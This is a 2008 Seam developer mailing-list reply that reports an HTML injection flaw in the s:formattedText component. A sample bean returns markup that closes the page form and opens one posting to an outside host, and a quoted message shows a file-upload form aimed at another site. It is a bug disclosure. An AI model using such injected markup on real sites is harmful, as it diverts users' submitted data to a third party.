[seam-dev] RE: Form, Input Elements and SeamText
Nick Belaevski
nbelaevski at exadel.com
Thu Oct 2 13:50:00 EDT 2008
Please consider the following example:
<html xmlns:h="http://java.sun.com/jsf/html"
xmlns:f="http://java.sun.com/jsf/core"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:rich="http://richfaces.org/rich"
xmlns:s="http://jboss.com/products/seam/taglib">
<body>
<h:form id="Form">
<s:formattedText value="#{bean.seamText}"/>
<h:commandButton value="Submit!"/>
</h:form>
</body>
</html>
bean.seamText =>
public String getSeamText() {
return "<br></form><form
action=\"http://www.jboss.org\"></br>";
}
Pressing "Submit!" command button will submit form to jboss.org instead of
the application host, so one can potentially spy other users.
Tested with Seam 2.1.0.beta1.
Best regards,
Nick Belaevski
> -----Original Message-----
> From: Christian Bauer [mailto:cbauer at redhat.com]
> Sent: Thursday, October 02, 2008 7:56 PM
> To: Nick Belaevski
> Cc: seam-dev at lists.jboss.org; Ilya Shaikovsky; Sergey Smirnov
> Subject: Re: Form, Input Elements and SeamText
>
>
> On Oct 02, 2008, at 18:50 , Nick Belaevski wrote:
>
> > <form action="http://somesite.com"><input type="file" /><input
> > type="submit" /></form>
> >
> > I suppose it is not safe that the user is possible to type in forms.
>
> Why not? Your browser can send whatever forms it wants to whatever site.
More information about the seam-dev
mailing list